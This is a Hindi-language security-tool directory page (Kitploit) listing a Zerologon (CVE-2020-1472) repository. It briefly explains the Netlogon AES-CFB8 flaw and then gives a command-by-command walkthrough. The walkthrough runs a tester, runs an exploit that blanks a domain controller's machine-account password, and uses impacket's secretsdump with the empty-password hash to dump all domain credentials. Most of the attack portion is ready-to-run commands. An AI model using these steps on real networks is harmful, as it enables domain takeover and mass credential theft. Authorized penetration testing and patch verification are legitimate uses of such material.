Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-1472 — [CVE-2020-1472] नेटलॉगन रिमोट प्रोटोकॉल कॉल (MS-NRPC) विशेषाधिकार वृद्धि (Zerologon) | Kitploit
उपकरण/GitHubGitHub/murataydemir/cve-2020-1472
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubmurataydemir/cve-2020-1472

CVE-2020-1472

[CVE-2020-1472] नेटलॉगन रिमोट प्रोटोकॉल कॉल (MS-NRPC) विशेषाधिकार वृद्धि (Zerologon)

रिपॉजिटरी देखें
125 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

[CVE-2020-1472] Netlogon रिमोट प्रोटोकॉल कॉल (MS-NRPC) विशेषाधिकार वृद्धि (Zerologon)

यहाँ वर्णित हमला एक क्रिप्टोग्राफिक प्रमाणीकरण प्रोटोकॉल (AES-CFB8 का असुरक्षित उपयोग) में कमजोरियों का फायदा उठाता है, जो डोमेन से जुड़े कंप्यूटर की प्रामाणिकता और पहचान को डोमेन कंट्रोलर (DC) के समक्ष साबित करता है। AES मोड ऑफ ऑपरेशन के गलत उपयोग के कारण, किसी भी कंप्यूटर खाते (स्वयं DC सहित) की पहचान को नकली बनाना और डोमेन में उस खाते के लिए एक खाली पासवर्ड सेट करना संभव है (बस कई Netlogon संदेश भेजकर जिनमें विभिन्न फ़ील्ड शून्य से भरे होते हैं)। इसका उपयोग डोमेन एडमिन क्रेडेंशियल प्राप्त करने के लिए किया जा सकता है और फिर मूल DC पासवर्ड को बहाल किया जा सकता है।

CVE-2020-1472 की जाँच करने के लिए

  • git clone https://github.com/SecuraBV/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • pip install -r requirements.txt
  • python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (उदाहरण: ./zerologon_tester.py DC01 172.16.208.161)

CVE-2020-1472 का शोषण करने के लिए

  • git clone https://github.com/dirkjanm/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (उदाहरण: ./cve-2020-1472-exploit.py DC01 172.16.208.161)
  • git clone https://github.com/SecureAuthCorp/impacket.git
  • cd impacket
  • pip install .
  • python setup.py install
  • cd examples

फिर, निम्नलिखित में से कोई एक कमांड चलाएँ

उदाहरण प्रारूप 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
उदाहरण प्रारूप 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

PoC की छवि

मूल ब्लॉग पोस्ट यहाँ उपलब्ध है
पायथन परीक्षण स्क्रिप्ट युक्त मूल रिपॉजिटरी यहाँ उपलब्ध है
पायथन एक्सप्लॉइट स्क्रिप्ट युक्त मूल रिपॉजिटरी यहाँ उपलब्ध है

टूल डाउनलोड करें